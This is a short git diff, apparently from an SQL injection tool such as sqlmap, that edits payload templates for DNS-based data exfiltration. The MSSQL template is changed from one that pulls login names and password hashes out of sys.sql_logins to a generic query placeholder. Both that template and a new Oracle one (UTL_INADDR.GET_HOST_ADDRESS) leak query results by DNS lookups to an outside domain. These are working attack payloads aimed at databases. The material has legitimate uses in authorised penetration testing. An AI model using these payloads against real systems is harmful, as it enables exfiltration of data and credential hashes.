diff --git a/procs/mssqlserver/dns_request.txt b/procs/mssqlserver/dns_request.txt index c97a469fb..eba4243af 100644 --- a/procs/mssqlserver/dns_request.txt +++ b/procs/mssqlserver/dns_request.txt @@ -1,5 +1,3 @@ -# Reference: http://www.defcon.org/images/defcon-15/dc15-presentations/dc-15-karlsson.pdf - DECLARE @host varchar(1024); -SELECT @host = name + '-' + master.sys.fn_varbintohexstr(password_hash) + '.%DOMAIN%' FROM sys.sql_logins; -EXEC('xp_fileexist "\' + @host + 'c$boot.ini"'); \ No newline at end of file +SELECT @host = (%QUERY%) + '.%DOMAIN%'; +EXEC('xp_fileexist "\' + @host + 'c$boot.ini"'); diff --git a/procs/oracle/dns_request.txt b/procs/oracle/dns_request.txt new file mode 100644 index 000000000..073e8fc11 --- /dev/null +++ b/procs/oracle/dns_request.txt @@ -0,0 +1 @@ +SELECT UTL_INADDR.GET_HOST_ADDRESS((%QUERY%)||%DOMAIN%) FROM DUAL